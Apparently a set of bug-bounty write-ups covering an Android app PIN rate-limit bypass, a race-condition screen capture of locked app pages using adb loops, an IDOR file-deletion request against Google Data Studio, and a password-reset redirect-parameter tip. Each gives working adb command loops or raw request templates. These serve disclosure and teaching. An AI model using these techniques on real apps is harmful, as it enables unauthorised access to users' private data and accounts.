Android pin bypass with rate limiting

 

Application pin rate limiting bypass

The bug is in private program .

There is a feature to lock mobile app with pin . But only 3 attempts. If we attempt wrong pin. The app logouts.

But there is a misconfig in this feature. If you enter the pin 2 times. close the app and open the app again you will get another 3 attempts . So the rate limiting bypassed by closing and calling the main activity

You can launch the main activity as many times as you want with adb

while true; 

 do adb shell am start -a android.intent.action.VIEW \
 -n com.redacted/com.redacted.MainActivity;

 sleep 4;

done

while the sleep time you can enter the pin 2 times and again the main activity will be called so you can enter pin again

Impact :- mobile auth pin rate limiting bypassed

No thanks for reading ..!

Creative Android pin bypass with Race conditon

 

Hitting main activity multiple times app allowing to view any activity inside an app. without even entering the mobile pin.

Bug ;-

Application has a mobile pin security. without entering the pin you cant enter into the app.

Bypass :-

But by calling internal activities like settings.activity and notifications.activity with race condition . The app is showing settings page ,profile page. but the problem is it only allow us to see for some seconds.So we need to automate it and take the screen shot by calling the activites .

for i in $(seq 20);do adb shell am start -a \

android.intent.action.VIEW -n com.redacted.android/.MainActivity -d \

 "https://redacted.com/notifications";adb shell screencap /sdcard/tmp/$i.png;done

The above command run 20 times and take screen shot of frontend and save it in sdcard directory.

Impact :

Attacker cant bypass the pin completely . but can view the content inside the app and know the sensitive info like . amount, profile info

NO thanks for reading

Idor in google product

 

Description :

Attacker can able to delete any file with vulnerable endpoint ..!

Endpoint :

POST /u/4/deleteShareable?appVersion=20190926_020020 HTTP/1.1
Host: datastudio.google.com
Connection: close
Content-Length: 54
Sec-Fetch-Mode: cors
Origin: https://datastudio.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
encoding: null
Sec-Fetch-Site: same-origin
Referer: https://datastudio.google.com/u/4/navigation/reporting

Cookie: RAP_XSRF_TOKEN=ACQ5uE-fZxoHyJIMJ6I9fWifDGZzjTeHCw:1569756166600; gh_7510439=;

{“id”:”9c491b49-a2f7–49fe-bd91-c4783657781",”type”:0}

vulnerable-paramerter : id

guessing id here not possible . But if the victim shared his file the id will be visible in url path

Triage Time

September 29,2019 : Reported

Oct 1, 2019 : Triaged

Oct 8, 2019 : bountry awarded 5k$

No thanks for reading the report :-

The Reset Password Attack Vector

 

Hey Guys,

Recently I have seen this attack vector mostly.
While resetting the password check for any redirect,callback,returnurl paramters in the post body.

Or try to param bruteforce it using any tool like param miner.
and try to change it to a custom bind payload.

{
  "email":"victim@mail.com",
  "Fuzz":"burpcollabarator/customclient"
}

and try that you getting the payload link in the email.